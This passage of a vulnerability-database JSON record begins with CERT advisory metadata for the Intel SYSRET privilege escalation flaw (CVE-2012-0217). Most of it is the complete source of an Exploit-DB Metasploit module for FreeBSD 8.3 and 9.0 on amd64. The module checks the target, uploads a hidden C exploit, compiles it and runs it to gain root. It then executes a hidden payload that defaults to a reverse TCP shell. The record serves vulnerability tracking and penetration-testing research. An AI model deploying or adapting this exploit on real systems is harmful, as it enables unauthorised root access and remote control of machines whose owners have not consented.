for reporting this vulnerability.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-0217](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-0217>), [CVE-2006-0744](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-0744>) \n---|--- \n**Date Public:** | 2006-04-12 \n**Date First Published:** | 2012-06-12 \n**Date Last Updated: ** | 2012-09-04 20:47 UTC \n**Document Revision: ** | 88 \n", "modified": "2012-09-04T20:47:00", "published": "2012-06-12T00:00:00", "id": "VU:649219", "href": "https://www.kb.cert.org/vuls/id/649219", "type": "cert", "title": "SYSRET 64-bit operating system privilege escalation vulnerability on Intel CPU hardware", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-03-07T15:18:36", "description": "", "published": "2019-03-07T00:00:00", "type": "exploitdb", "title": "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2019-03-07T00:00:00", "id": "EDB-ID:46508", "href": "https://www.exploit-db.com/exploits/46508", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'FreeBSD Intel SYSRET Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the FreeBSD kernel,\r\n when running on 64-bit Intel processors.\r\n\r\n By design, 64-bit processors following the X86-64 specification will\r\n trigger a general protection fault (GPF) when executing a SYSRET\r\n instruction with a non-canonical address in the RCX register.\r\n\r\n However, Intel processors check for a non-canonical address prior 
to\r\n dropping privileges, causing a GPF in privileged mode. As a result,\r\n the current userland RSP stack pointer is restored and executed,\r\n resulting in privileged code execution.\r\n\r\n This module has been tested successfully on:\r\n\r\n FreeBSD 8.3-RELEASE (amd64); and\r\n FreeBSD 9.0-RELEASE (amd64).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Rafal Wojtczuk', # Discovery\r\n 'John Baldwin', # Discovery\r\n 'iZsh', # Exploit\r\n 'bcoles' # Metasploit\r\n ],\r\n 'DisclosureDate' => '2012-06-12',\r\n 'Platform' => ['bsd'],\r\n 'Arch' => [ARCH_X64],\r\n 'SessionTypes' => ['shell'],\r\n 'References' =>\r\n [\r\n ['BID', '53856'],\r\n ['CVE', '2012-0217'],\r\n ['EDB', '28718'],\r\n ['PACKETSTORM', '113584'],\r\n ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],\r\n ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],\r\n ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],\r\n ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],\r\n ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],\r\n ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']\r\n ],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}]\r\n ],\r\n 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },\r\n 'DefaultTarget' => 0))\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n 
cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data, gcc_args='')\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n chmod path\r\n end\r\n\r\n def exploit_data(file)\r\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file)\r\n end\r\n\r\n def is_root?\r\n (cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0')\r\n end\r\n\r\n def strip_comments(c_code)\r\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\r\n end\r\n\r\n def check\r\n kernel_release = cmd_exec('uname -r').to_s\r\n unless kernel_release =~ /^(8\\.3|9\\.0)-RELEASE/\r\n vprint_error \"FreeBSD version #{kernel_release} is not vulnerable\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n vprint_good \"FreeBSD version #{kernel_release} appears vulnerable\"\r\n\r\n arch = cmd_exec('uname -m').to_s\r\n unless arch.include? '64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n hw_model = cmd_exec('/sbin/sysctl hw.model').to_s\r\n unless hw_model.downcase.include? 'intel'\r\n vprint_error \"#{hw_model} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{hw_model} is vulnerable\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. 
Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\r\n end\r\n end\r\n\r\n unless writable? base_dir\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload and compile exploit executable\r\n executable_name = \".#{rand_text_alphanumeric 5..10}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n upload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall'\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Launching exploit...'\r\n output = cmd_exec executable_path\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n unless is_root?\r\n fail_with Failure::Unknown, 'Exploitation failed'\r\n end\r\n print_good \"Success! Executing payload...\"\r\n\r\n cmd_exec payload_path\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/46508"}]}